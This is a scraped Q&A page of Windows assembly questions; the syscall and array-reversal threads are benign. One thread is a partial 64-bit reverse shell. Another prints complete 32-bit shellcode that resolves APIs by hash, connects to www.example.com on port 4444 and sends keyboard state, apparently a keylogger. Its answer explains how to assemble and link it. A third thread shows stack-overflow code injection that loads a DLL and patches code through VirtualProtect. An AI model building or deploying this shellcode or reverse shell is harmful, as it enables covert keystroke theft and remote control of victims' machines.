How to get Windows system calls assembly statically? - windows

I am trying to find a specific pattern in the Windows system calls, for research purposes.
So far i've been looking into the Windows dlls such as ntdll.dll, user32.dll, etc., but those seem to contain only wrapper codes for preparing to jump to the system call. For example:
mov eax, 101Eh
lea edx, [esp+arg_0]
mov ecx, 0
call large dword ptr fs:0C0h
retn 10h
I'm guessing the call large dword ptr fs:0C0h instruction is another gateway in the chain that finally leads to the actual assembly, but I was wondering if I can get to that assembly directly.

You're looking in the wrong dlls. The system calls are in ntoskrnl.exe.
If you look at NtOpenFile() in ntoskrnl.exe you'll see:
mov r11, rsp
sub rsp, 88h
mov eax, [rsp+88h+arg_28]
xor r10d, r10d
mov [r11-10h], r10
mov [rsp+88h+var_18], 20h ; int
mov [r11-20h], r10d
mov [r11-28h], r10
mov [r11-30h], r10d
mov [r11-38h], r10d
mov [r11-40h], r10
mov [rsp+88h+var_48], eax ; int
mov eax, [rsp+88h+arg_20]
mov [rsp+88h+var_50], 1 ; int
mov [rsp+88h+var_58], eax ; int
mov [r11-60h], r10d
mov [r11-68h], r10
call IopCreateFile
add rsp, 88h
retn
Which is the true body of the function. Most of the work is done in IopCreateFile(), but you can follow it statically and do whatever analysis you need.

Related

when writing 64bit reverse shell in assembly got stuck at createrprocessA api

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
;createprocessA_calling
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
_main:
push rbp
lea rdi, [rel array]
call _printy
call _reverse
call _printy
pop rbp
call _exit
_reverse:
push rbp
lea rsi, [rdi + 4 * (length - 1) ]
.LOOP2:
cmp rdi, rsi
jge .DONE2
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
add rdi,4
sub rsi,4
jmp .LOOP2
.DONE2:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
_printy:
push rbp
xor rcx, rcx
mov r8, rdi
.loop:
cmp rcx, length
jge .done
push rcx
push r8
lea rdi, [rel msg]
mov rsi, [r8 + rcx * 4]
xor rax, rax
call _printf
pop r8
pop rcx
add rcx, 1
jmp .loop
.done:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

Non-blocking keyboard input x64 windows assembly / c++

I need a code in windows x64 assembly that would either:
a) Read data from user keyboard(stdin) in a non blocking way.
b) The way to check if there is data so I know if i should invoke readFile already or skip this step
c) Fix to the implementation I made so far
So far i tried the function PeekNamedPipe but it just doesnt seem to work. Here is the code I have so far:
mov rcx, dword -10
sub rsp, 28h
call GetStdHandle
add rsp, 28h
mov [std_in_handle], rax
sub rsp, 30h
mov rcx, qword [std_in_handle]
mov rdx, qword 0
mov r8d, dword 0
mov r9, qword 0
mov qword [rsp+0x20], bytes_available
mov qword [rsp+0x28], 0
call PeekNamedPipe
add rsp, 30h
cmp dword [bytes_available], dword 0
je .skip_reading_input
sub rsp, 28h
mov rcx, qword [std_in_handle]
mov rdx, qword input_char
mov r8d, dword 1
mov r9, qword BytesRead
mov qword [rsp+0x20], 0
call ReadFile
add rsp, 28h
.skip_reading_input
The thing is that value in bytes_available is always 0 even if i type something on the keyboard, so readfile is always skipped.
I managed to somehow solve my particular problem using this function
extern GetAsyncKeyState
it has options to return given value when the key is pressed OR when it was pressed since last call to the function - so I call this function once at the beginning of the program and then check if it has been called since that time. However there is number of issues when using this approach so I will check the ones that others suggested soon and will maybe post better solution.

How can I compile / execute the following code on Windows 7 32 Bit?

Can you tell me how I can execute this code on a windows 7 32bit machine?
Do I need to compile it? If yes, how should I do this?
Which ending (.exe) should the file have?
section .bss
section .data
section .text
global _start
_start:
cld
call dword loc_88h
pushad
mov ebp,esp
xor eax,eax
mov edx,[fs:eax+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
loc_15h:
mov esi,[edx+0x28]
movzx ecx,word [edx+0x26]
xor edi,edi
loc_1eh:
lodsb
cmp al,0x61
jl loc_25h
sub al,0x20
loc_25h:
ror edi,byte 0xd
add edi,eax
loop loc_1eh
push edx
push edi
mov edx,[edx+0x10]
mov ecx,[edx+0x3c]
mov ecx,[ecx+edx+0x78]
jecxz loc_82h
add ecx,edx
push ecx
mov ebx,[ecx+0x20]
add ebx,edx
mov ecx,[ecx+0x18]
loc_45h:
jecxz loc_81h
dec ecx
mov esi,[ebx+ecx*4]
add esi,edx
xor edi,edi
loc_4fh:
lodsb
ror edi,byte 0xd
add edi,eax
cmp al,ah
jnz loc_4fh
add edi,[ebp-0x8]
cmp edi,[ebp+0x24]
jnz loc_45h
pop eax
mov ebx,[eax+0x24]
add ebx,edx
mov cx,[ebx+ecx*2]
mov ebx,[eax+0x1c]
add ebx,edx
mov eax,[ebx+ecx*4]
add eax,edx
mov [esp+0x24],eax
pop ebx
pop ebx
popad
pop ecx
pop edx
push ecx
jmp eax
loc_81h:
pop edi
loc_82h:
pop edi
pop edx
mov edx,[edx]
jmp short loc_15h
loc_88h:
pop ebp
push dword 0x3233
push dword 0x5f327377
push esp
push dword 0x726774c
call ebp
mov eax,0x190
sub esp,eax
push esp
push eax
push dword 0x6b8029
call ebp
push byte +0x10
jmp dword loc_1ceh
loc_b2h:
push dword 0x803428a9
call ebp
lea esi,[eax+0x1c]
xchg esi,esp
pop eax
xchg esp,esi
mov esi,eax
push dword 0x6c6c
push dword 0x642e7472
push dword 0x6376736d
push esp
push dword 0x726774c
call ebp
jmp dword loc_1e3h
loc_dfh:
push dword 0xd1ecd1f
call ebp
xchg ah,al
ror eax,byte 0x10
inc eax
inc eax
push esi
push eax
mov esi,esp
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
inc eax
push eax
push eax
push dword 0xe0df0fea
call ebp
mov edi,eax
loc_104h:
push byte +0x10
push esi
push edi
push dword 0x6174a599
call ebp
test eax,eax
jz loc_122h
dec dword [esi+0x8]
jnz loc_104h
xor eax,eax
push eax
push dword 0x56a2b5f0
call ebp
loc_122h:
push dword 0x3233
push dword 0x72657375
push esp
push dword 0x726774c
call ebp
push dword 0x657461
push dword 0x74537965
push dword 0x4b746547
push esp
push eax
push dword 0x7802f749
call ebp
push esi
push edi
push eax
xor ecx,ecx
mov esi,ecx
mov cl,0x8
loc_155h:
push esi
loop loc_155h
loc_158h:
xor ecx,ecx
xor esi,esi
push byte +0x8
push dword 0xe035f044
call ebp
loc_165h:
mov eax,esi
cmp al,0xff
jnc loc_158h
inc esi
push esi
call dword [esp+0x24]
mov edx,esi
xor ecx,ecx
mov cl,0x80
and eax,ecx
xor ecx,ecx
cmp eax,ecx
jnz loc_18fh
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
btr [esp+eax*4],edx
jmp short loc_165h
loc_18fh:
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bt [esp+eax*4],edx
jc loc_165h
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bts [esp+eax*4],edx
push esi
push byte +0x10
push dword [esp+0x30]
push byte +0x0
push byte +0x1
lea ecx,[esp+0x10]
push ecx
push dword [esp+0x3c]
push dword 0xdf5c9d75
call ebp
lea esp,[esp+0x4]
jmp short loc_158h
loc_1ceh:
call dword loc_b2h
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
This looks like 32-bit NASM assembly code(A simple beginners introduction). You can assemble it (not compile it) with this installer from the NASM website (version 2.12.02 at the time of this answer).
Assembling and linking it on Windows 7 works like this:
If you have the Microsoft C compiler, you have (somewhere) the linker from Microsoft named link.exe. If you don’t, you can download the Windows 7 SDK, which provides the C compiler and linker(link.exe).
nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib
But a quick glance over the code makes obvious that there are NO obviously named API calls in it, so the destination platform(Windows, Linux, MacOS, other) is difficult to determine. So this code may assemble, but its execution may(!) be useless(unless run in a debugger) nevertheless.

Self modifying algorithms with Virtualprotect problems

I'm having problems with the Virtualprotect() api by windows.
I got an assignment from school, my teacher told us that in the past when memory was scarce and costly. Programmers had to create advanced algorithms that would modify itself on the fly to save memory. So there you have it, we must now write such an algorithm, it doesn't have to be effective but it must modify itself.
So I set out to do just that, and I think that I made it pretty far before asking for any help.
My program works like this:
I have a function and a loop with a built-in stack overflow. The stack gets overflown with the address of a memory location where code resides that is constructed during the loop. Control is passed to the code in memory. The code loads a dll and then exits, but before it exits it has to repair the loop. It is one of the conditions of our assignment, everything changed in the original loop must be restored.
The problem is that I don't have write access to the loop, only READ_EXECUTE, so to change my access I thought, I use virtualprotect. But that function returned an error:
ERROR_NOACCESS, the documentation on this error is very slim, windows only says: Invailid access to memory address. Which figures since I wanted to change the access in the first place. So what's wrong? Here's the code constructed in memory:
The names of all the data in my code is a little vague, so I provided a few comments
Size1:
TrapData proc
jmp pLocals
LocalDllName db 100 dup(?) ; name of the dll to be called ebx-82h
RestoreBuffer db 5 dup(?) ; previous bytes at the overflow location
LoadAddress dd 0h ; ebx - 19h ; address to kernel32.loadlibrary
RestoreAddress dd 0h ; ebx - 15h ; address to restore (with the restore buffer)
AddressToRestoreBuffer dd 0h ; ebx - 11h ; obsolete, I don't use this one
AddressToLea dd 0h ; ebx - 0Dh Changed, address to kernel32.virutalprotect
AddressToReturnTo dd 0h ; ebx - 9h address to return execution to(the same as RestoreAddress
pLocals:
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
;);
mov eax, ebx
mov esi, ebx
sub eax, 82h
push eax ; overwrite the buffer containing the dll name, we don't need it anymore
push PAGE_EXECUTE_READWRITE
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx ; Returns error 998 ERROR_NOACCESS (to what?)
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
#0:
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
ret
Size2:
So what's wrong?
Can you guys help me?
EDIT, Working code:
Size1:
jmp pLocals
LocalDllName db 100 dup(?)
RestoreBuffer db 5 dup(?)
LoadAddress dd 0h ; ebx - 19h
RestoreAddress dd 0h ; ebx - 15h
AddressToRestoreBuffer dd 0h ; ebx - 11h
AddressToLea dd 0h ; ebx - 0Dh
AddressToReturnTo dd 0h ; ebx - 9h
pLocals:
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
;);
mov esi, ebx
push 0
push esp
push PAGE_EXECUTE_READWRITE
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx
pop ebx
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
#0:
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
ret
Size2:
Maybe a little sloppy, but I that doesn't mater ;)
You are trying to make VirtualProtect write lpflOldProtect to a read-only memory location, i.e. your current code section which is what you're trying to unprotect in the first place! My guess is this is what gives you the ERROR_NO_ACCESS. Since you're using the stack anyway, have it write lpflOldProtect to a stack location.
This isn't nearly as easy as it was in the old days; read access used to imply execute access, and a lot of memory mappings were mapped writable.
These days, I'd be surprised if there are many (any?) memory mappings that are both writable and executable. (And modern CPUs with PAE support are sufficient for even 32-bit kernels to provide non-executable-yet-readable mappings.)
I'd say, first things first, find an older Windows system, Win2k or earlier, then start trying to tackle this problem. :)
EDIT: Oh! I thought loading the DLL failed. Good work. :)
What do you mean by 'restore the loop'? Since you smashed the stack to jump to your code, you didn't really destroy the loop's text segment, you only scribbled on the stack. You could insert another function before your loop, then return from your dll to the function that called your loop. (You 'returned' into your injected code from the loop, so you can't return into the loop without building a fake stack frame for it; returning to the previous function seems easier than building a fake stack frame.)

Resources